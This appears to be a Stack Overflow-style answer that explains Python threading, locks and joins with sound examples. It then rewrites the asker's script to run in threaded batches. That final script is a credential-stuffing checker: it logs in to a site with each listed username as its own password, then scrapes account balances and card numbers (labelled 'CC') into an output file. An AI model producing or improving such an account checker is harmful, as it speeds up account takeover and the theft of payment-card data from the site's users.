As bmcculley has mentioned, you can refer to this question, or you can refer to the docs.
How to multithread
Multithreading in Python can be done through the threading module. For your case, you will need to know how to create threads, how to lock them, and how to join them.
Create a thread
One way to create a thread is to make a class for it. The class subclasses threading.Thread and overrides its run() method.
import threading

class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Your code here
        pass
You can also add arguments to __init__, as you would for any other class.
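As a minimal sketch of passing arguments, the hypothetical SquareThread below takes a number in its constructor and stores a result on the instance. The class name and its attributes are illustrative only and are not part of your code.

```python
import threading


class SquareThread(threading.Thread):
    """Hypothetical example thread that squares one number."""

    def __init__(self, number):
        threading.Thread.__init__(self)
        self.number = number   # argument passed in by the caller
        self.result = None     # filled in by run()

    def run(self):
        self.result = self.number * self.number


square_thread = SquareThread(7)
square_thread.start()
square_thread.join()   # wait for run() to finish before reading the result
print(square_thread.result)
```

Storing the result on the instance is one simple way to get a value back out of a thread, since run() cannot return anything to the caller.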
Run a thread
After you create a class for your thread, you can then make a thread:
thread = MyThread()
and run it:
thread.start()
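Note that it is start(), not run(), that launches the new thread. Calling run() directly just executes the method in the current thread. The sketch below uses a hypothetical NameThread class (not from your code) that records which thread executed run():

```python
import threading


class NameThread(threading.Thread):
    """Hypothetical thread that records which thread executed run()."""

    def __init__(self):
        threading.Thread.__init__(self)
        self.ran_in = None

    def run(self):
        self.ran_in = threading.current_thread().name


direct = NameThread()
direct.run()            # plain method call: executes in the calling thread

started = NameThread()
started.start()         # spawns a new thread, which then calls run()
started.join()

# Compare the recorded names with the calling thread and the new thread
print(direct.ran_in == threading.current_thread().name)
print(started.ran_in == started.name)
```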
Locking multiple threads
A lock prevents multiple threads from using a resource at the same time. This is needed for your case, as your threads will be writing to saida.txt and printing to standard output.
Let's say you have a thread WriteThread that writes some text to a file:
import threading

class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # Use the attributes stored on the instance
        self.output.write(self.text)

with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()
    # Keep the file open until both threads have written
    # (see "Joining multiple threads")
    thread_a.join()
    thread_b.join()
The program may still work, but it is not a good idea to let both threads access the same file concurrently. Instead, a lock is held while thread_a is writing to the file, which prevents thread_b from writing at the same time.
import threading

file_lock = threading.Lock()

class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # Acquire Lock
        file_lock.acquire()
        try:
            self.output.write(self.text)
        finally:
            # Release Lock, even if the write fails
            file_lock.release()

with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()
    # Keep the file open until both threads have written
    a.join()
    b.join()
What file_lock.acquire() means is that the thread will wait until whichever thread currently holds file_lock releases it. Only then can it use the file.
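A Lock can also be used in a with statement, which acquires it on entry and releases it on exit, even if the body raises an exception. The sketch below is illustrative only: counter, counter_lock and add_many are made-up names, and it uses threading.Thread(target=...) instead of a subclass just to keep the example short.

```python
import threading

counter_lock = threading.Lock()
counter = 0


def add_many(times):
    """Increment the shared counter `times` times, one locked step each."""
    global counter
    for _ in range(times):
        # Same effect as acquire() ... release(), but the lock is
        # released automatically when the block exits.
        with counter_lock:
            counter += 1


workers = [threading.Thread(target=add_many, args=(10000,)) for _ in range(4)]
for w in workers:
    w.start()
for w in workers:
    w.join()

print(counter)  # 4 threads x 10000 increments = 40000
```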
Joining multiple threads
Joining is a way to wait for threads to finish. Calling join() on a thread blocks the caller (usually the main thread) until that thread has completed, so joining every thread means the caller proceeds only after all of them are done.
Let's say I have two threads that have different code execution times and I want both of them to complete whatever they are doing before proceeding.
import threading
import time

class WaitThread(threading.Thread):
    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text

    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        print(self.text)

# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")

threads = []
threads.append(thread_a)
threads.append(thread_b)

# Start threads
thread_a.start()
thread_b.start()

# Join threads
for t in threads:
    t.join()

print("Both threads have ended!")
In this example, thread_a prints before thread_b. However, the final "Both threads have ended!" message is printed only after both thread_a and thread_b have printed.
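join() also accepts an optional timeout in seconds, after which it returns whether or not the thread has finished. You can then check is_alive() to see which case happened. A small sketch, where SleepThread and the durations are arbitrary choices for illustration:

```python
import threading
import time


class SleepThread(threading.Thread):
    """Hypothetical thread that just sleeps for a given time."""

    def __init__(self, seconds):
        threading.Thread.__init__(self)
        self.seconds = seconds

    def run(self):
        time.sleep(self.seconds)


slow = SleepThread(0.5)
slow.start()

slow.join(0.05)                   # stop waiting after 0.05 seconds
still_running = slow.is_alive()   # expected to be True: it sleeps ~0.5 s

slow.join()                       # no timeout: block until it finishes
finished = not slow.is_alive()

print(still_running, finished)
```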
Application
Now, back to your code.
Besides implementing multithreading, locking and joining, I have made quite a few other changes, but the main idea is to have two locks (one for printing and one for writing to your file) and to run the threads in batches of a limited size. (Too many threads is not good! Refer to this question.)
import mechanize
from bs4 import BeautifulSoup as BS
import threading

# Max no. of threads allowed to be alive.
limit = 10

entrada = "entrada.txt"
saida = "saida.txt"

def write(text):
    with open(saida, "a") as f:
        f.write(text)

# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()

def print_out(text):
    printLock.acquire()
    print(text)
    printLock.release()
# Thread for each user
class UserThread(threading.Thread):
    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()

    def run(self):
        to_file = ""
        try:
            cont = 1
            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.set_handle_robots(False)
            br.open("https://site")
            # Submit form
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()
            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # Write to file
            txt = "\nConta - Saldo["+value[2].text+"]\n"
            print_out(txt)
            to_file += txt
            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            # Write to file
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            to_file += txt
            for tds in soup.find_all("td"):
                if len(tds.text) > 30:
                    # Write to file
                    cc = "CC["+str(cont)+"] ~> "+tds.text+"\n"
                    print_out(cc)
                    to_file += cc
                    cont += 1
            txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
            to_file += txt
        except Exception:
            erro = "\n[!]Erro ao logar["+self.user+"]\n-------------------------------------------------\n"
            to_file += erro
            print_out(erro)
        # Write everything to file
        fileLock.acquire()
        write(to_file)
        fileLock.release()
threads = []
with open(entrada) as fp:
    for user in fp:
        threads.append(UserThread(user))

active_threads = []
for thread in threads:
    # Start the thread and add it to the current batch
    thread.start()
    active_threads.append(thread)
    if len(active_threads) >= limit:
        # Wait for the whole batch to complete before moving to the next set
        for t in active_threads:
            t.join()
        active_threads = []

# Wait for the last (possibly partial) batch
for t in active_threads:
    t.join()
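The batching idea can also be factored into a small helper. This is only a sketch under assumptions: run_in_batches, PeakThread and the stats dictionary are hypothetical names used to show that no more than limit threads are alive at once, and the short sleep stands in for the real network work.

```python
import threading
import time


def run_in_batches(threads, limit):
    """Start threads at most `limit` at a time, joining each batch."""
    for first in range(0, len(threads), limit):
        batch = threads[first:first + limit]
        for t in batch:
            t.start()
        for t in batch:
            t.join()   # wait for the whole batch before starting the next


stats_lock = threading.Lock()
stats = {"running": 0, "peak": 0}


class PeakThread(threading.Thread):
    """Hypothetical worker that tracks how many workers run at once."""

    def run(self):
        with stats_lock:
            stats["running"] += 1
            stats["peak"] = max(stats["peak"], stats["running"])
        time.sleep(0.01)   # stand-in for real work
        with stats_lock:
            stats["running"] -= 1


batch_workers = [PeakThread() for _ in range(25)]
run_in_batches(batch_workers, limit=10)
print(stats["peak"] <= 10)
```

One trade-off of batching is that a single slow thread holds up its whole batch. A thread pool avoids that, at the cost of restructuring the code around tasks rather than Thread subclasses.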
Minor Edits:
Changed all single quotes to double quotes
Added spacing around operators and elsewhere where needed
Removed unused variable ua
Replaced the unused assignments response = br.submit() and response = br.open("https://test/sub") with br.submit() and br.open("https://test/sub")